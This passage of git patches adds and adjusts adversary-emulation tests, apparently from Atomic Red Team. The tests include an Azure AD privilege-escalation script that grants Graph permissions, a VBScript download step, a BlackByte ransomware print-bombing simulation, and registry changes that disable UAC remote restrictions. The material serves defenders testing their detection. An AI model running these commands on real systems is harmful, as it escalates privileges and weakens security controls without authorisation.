+      Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
+      }
+
+      #Add required resource accesses
+      $requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
+      $requiredResourcesAccess.Add($requiredGraphAccess)
+
+      #Set permissions in existing Azure AD App
+      Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess
+
+      $servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}
+
+      New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id
+
+    cleanup_command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+      Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
+      
+    name: powershell
+    elevation_required: false

From eb50e5b1e033dc7c5abac50ae5f6fb0266955235 Mon Sep 17 00:00:00 2001
From: WojciechLesicki <wojciech.lesicki@gmail.com>
Date: Sun, 6 Mar 2022 18:59:52 +0100
Subject: [PATCH 05/83] Adding new lines

---
 atomics/T1098/T1098.md | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index e7d4a010..4b3c7a24 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -516,10 +516,10 @@ The account you use to run the PowerShell command should have Global Administrat
 
 Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
 You can also take a look at the materials:
-https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
-https://github.com/reprise99/Sentinel-Queries
-https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
-https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
+https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/</br>
+https://github.com/reprise99/Sentinel-Queries</br>
+https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766</br>
+https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb</br>
 
 **Supported Platforms:** Azure-ad
 

From 54f98b99300ec05a6c98e6b37922119ff847c716 Mon Sep 17 00:00:00 2001
From: WojciechLesicki <wojciech.lesicki@gmail.com>
Date: Sun, 6 Mar 2022 19:15:00 +0100
Subject: [PATCH 06/83] Added one more newline :)

---
 atomics/T1098/T1098.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index 4b3c7a24..443738d5 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -515,7 +515,7 @@ The DirectoryRecommendations.Read.All permissions have been selected as the defa
 The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
 
 Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
-You can also take a look at the materials:
+You can also take a look at the materials:</br>
 https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/</br>
 https://github.com/reprise99/Sentinel-Queries</br>
 https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766</br>

From 999d18a36d0719b6b661b8c3e880fe18444d2f07 Mon Sep 17 00:00:00 2001
From: lucasRiley <70220074+lucasRiley@users.noreply.github.com>
Date: Mon, 7 Mar 2022 10:38:41 -0600
Subject: [PATCH 07/83] T1059.005 Fix Cleanup and Prereq (#1798)

Co-authored-by: Riley <lriley@NTI.local>
---
 atomics/T1059.005/T1059.005.yaml | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml
index 3425d472..283e87dd 100644
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -19,13 +19,11 @@ atomic_tests:
   - description: Sample script must exist on disk at specified location (#{vbscript})
     prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} '
     get_prereq_command: |-
-      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
       New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-      Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
   executor:
     command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
     cleanup_command: |-
-      Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
       Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
     name: powershell
 

From c81858120bdcef3c034bdc5f23ff336df8f176aa Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 7 Mar 2022 16:39:15 +0000
Subject: [PATCH 08/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml     | 7 ++-----
 atomics/T1059.005/T1059.005.md | 4 +---
 2 files changed, 3 insertions(+), 8 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3f4028e3..d12ebc5f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -66538,14 +66538,11 @@ execution:
       - description: Sample script must exist on disk at specified location (#{vbscript})
         prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} '
         get_prereq_command: |-
-          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
           New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-          Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
       executor:
         command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
-        cleanup_command: |-
-          Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
-          Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
+        cleanup_command: Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
         name: powershell
     - name: Encoded VBS code execution
       auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md
index d81a0599..e69abb22 100644
--- a/atomics/T1059.005/T1059.005.md
+++ b/atomics/T1059.005/T1059.005.md
@@ -46,7 +46,6 @@ cscript #{vbscript} > $env:TEMP\T1059.005.out.txt
 
 #### Cleanup Commands:
 ```powershell
-Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
 Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
 ```
 
@@ -60,9 +59,8 @@ if (Test-Path #{vbscript}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
 New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
 ```
 
 

From 5388982089e25ad30c8e9285b7195f2b69982b8a Mon Sep 17 00:00:00 2001
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com>
Date: Mon, 7 Mar 2022 11:18:20 -0600
Subject: [PATCH 09/83] Adding T1059.003 Test 4 - BlackByte Print Bombing
 (#1799)

Adding T1059.003 Test 4, which is designed to emulate the print bombing behavior observed in recent BlackByte ransomware attacks.

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1059.003/T1059.003.yaml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index db254e43..3ef2947a 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -71,3 +71,33 @@ atomic_tests:
     command: |
       %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
     name: command_prompt
+- name: Simulate BlackByte Ransomware Print Bombing
+  description: |
+    This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
+    It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
+    See https://redcanary.com/blog/blackbyte-ransomware/. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_to_print:
+      description: File to be opened/printed by Wordpad.
+      type: String
+      default: $env:temp\T1059_003note.txt
+    max_to_print:
+      description: The maximum number of Wordpad windows the test will open/print.
+      type: String
+      default: 75
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      File to print must exist on disk at specified location (#{file_to_print})
+    prereq_command: |
+      if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+    get_prereq_command: |
+      new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+  executor:
+    command: |
+      cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+    cleanup_command: |
+      stop-process -name wordpad -force -erroraction silentlycontinue
+    name: powershell

From a38b68f06789e4b5edb00f85e7badb17f4303285 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 7 Mar 2022 17:18:39 +0000
Subject: [PATCH 10/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1059.003/T1059.003.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index 3ef2947a..b3dacb8e 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -72,6 +72,7 @@ atomic_tests:
       %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
     name: command_prompt
 - name: Simulate BlackByte Ransomware Print Bombing
+  auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
   description: |
     This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
     It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 9ae01810..eb5a741a 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -881,3 +881,4 @@ c59f246a-34f8-4e4d-9276-c295ef9ba0dd
 5fc528dd-79de-47f5-8188-25572b7fafe0
 e895677d-4f06-49ab-91b6-ae3742d0a2ba
 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+6b2903ac-8f36-450d-9ad5-b220e8a2dcb9

From 7dd9d481b55e380d2ea5b2229e294811c8cfac11 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 7 Mar 2022 17:18:44 +0000
Subject: [PATCH 11/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 39 ++++++++++++++
 atomics/T1059.003/T1059.003.md                | 54 +++++++++++++++++++
 6 files changed, 97 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 73650152..cfb6798c 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -971,6 +971,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
+execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 3a1e2069..2fa6001e 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -687,6 +687,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
+execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index ff1fcce3..13ee0894 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1623,6 +1623,7 @@
   - Atomic Test #1: Create and Execute Batch Script [windows]
   - Atomic Test #2: Writes text to a file and displays it. [windows]
   - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
+  - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]
   - Atomic Test #2: WMI Reconnaissance Processes [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index ec79cb1c..d4fc8630 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1166,6 +1166,7 @@
   - Atomic Test #1: Create and Execute Batch Script [windows]
   - Atomic Test #2: Writes text to a file and displays it. [windows]
   - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
+  - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]
   - Atomic Test #2: WMI Reconnaissance Processes [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index d12ebc5f..3e57761d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -66745,6 +66745,45 @@ execution:
         command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file}
           & type #{output_file}\n"
         name: command_prompt
+    - name: Simulate BlackByte Ransomware Print Bombing
+      auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+      description: "This test attempts to open a file a specified number of times
+        in Wordpad, then prints the contents. \nIt is designed to mimic BlackByte
+        ransomware's print bombing technique, where tree.dll, which contains the ransom
+        note, is opened in Wordpad 75 times and then printed. \nSee https://redcanary.com/blog/blackbyte-ransomware/.
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_to_print:
+          description: File to be opened/printed by Wordpad.
+          type: String
+          default: "$env:temp\\T1059_003note.txt"
+        max_to_print:
+          description: The maximum number of Wordpad windows the test will open/print.
+          type: String
+          default: 75
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'File to print must exist on disk at specified location (#{file_to_print})
+
+'
+        prereq_command: 'if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'new-item #{file_to_print} -value "This file has been
+          created by T1059.003 Test 4" -Force | Out-Null
+
+'
+      executor:
+        command: 'cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe
+          /p #{file_to_print}" | out-null
+
+'
+        cleanup_command: 'stop-process -name wordpad -force -erroraction silentlycontinue
+
+'
+        name: powershell
   T1047:
     technique:
       id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md
index 622de096..350636eb 100644
--- a/atomics/T1059.003/T1059.003.md
+++ b/atomics/T1059.003/T1059.003.md
@@ -14,6 +14,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
 
 - [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell)
 
+- [Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing](#atomic-test-4---simulate-blackbyte-ransomware-print-bombing)
+
 
 <br/>
 
@@ -137,4 +139,56 @@ Command line executed via suspicious invocation. Example is from the 2021 Threat
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing
+This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
+It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
+See https://redcanary.com/blog/blackbyte-ransomware/.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_print | File to be opened/printed by Wordpad. | String | $env:temp&#92;T1059_003note.txt|
+| max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+```
+
+#### Cleanup Commands:
+```powershell
+stop-process -name wordpad -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: File to print must exist on disk at specified location (#{file_to_print})
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+```
+
+
+
+
 <br/>

From 43fa5fb8a06a401079a89c2dcd395cca17fcb73a Mon Sep 17 00:00:00 2001
From: SecWilson <47117894+SecWilson@users.noreply.github.com>
Date: Mon, 7 Mar 2022 11:33:31 -0600
Subject: [PATCH 12/83] Blackbyte privilege escalation via Powershell (#1796)

Co-authored-by: Wilson <SWilson@nti.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1112/T1112.yaml | 24 +++++++++++++++++++++++-
 1 file changed, 23 insertions(+), 1 deletion(-)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 48c7f4bd..8728e16f 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -132,4 +132,26 @@ atomic_tests:
       reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
     name: command_prompt
     elevation_required: true
-    
+- name: BlackByte Ransomware Registry Changes - Powershell
+  description: |
+    This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+    The steps are as follows:
+    <ol>
+        <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+        <li>2. Enable OS to share network connections between different privilege levels</li>
+        <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+    </ol>
+    The registry keys and their respective values will be created upon successful execution.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+      New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+    cleanup_command: |
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
+      Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+    name: powershell
+    elevation_required: true

From 03c3400af98646923ea6ea28050d6276f8031bf6 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 7 Mar 2022 17:34:02 +0000
Subject: [PATCH 13/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1112/T1112.yaml | 1 +
 atomics/used_guids.txt   | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 8728e16f..0f10ccb5 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -133,6 +133,7 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
 - name: BlackByte Ransomware Registry Changes - Powershell
+  auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
   description: |
     This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
     The steps are as follows:
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index eb5a741a..5c8dfb49 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -882,3 +882,4 @@ c59f246a-34f8-4e4d-9276-c295ef9ba0dd
 e895677d-4f06-49ab-91b6-ae3742d0a2ba
 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+0b79c06f-c788-44a2-8630-d69051f1123d

From 682d8d732bae56e8f7906027ae622013629cb368 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 7 Mar 2022 17:34:07 +0000
Subject: [PATCH 14/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 24 ++++++++++
 atomics/T1112/T1112.md                        | 45 +++++++++++++++++++
 6 files changed, 73 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cfb6798c..1e582b39 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -474,6 +474,7 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2fa6001e..25300732 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -306,6 +306,7 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 13ee0894..f6f7eabc 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -749,6 +749,7 @@
   - Atomic Test #5: Javascript in registry [windows]
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
   - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d4fc8630..5a6fc548 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -518,6 +518,7 @@
   - Atomic Test #5: Javascript in registry [windows]
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
   - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3e57761d..41480ad8 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31591,6 +31591,30 @@ defense-evasion:
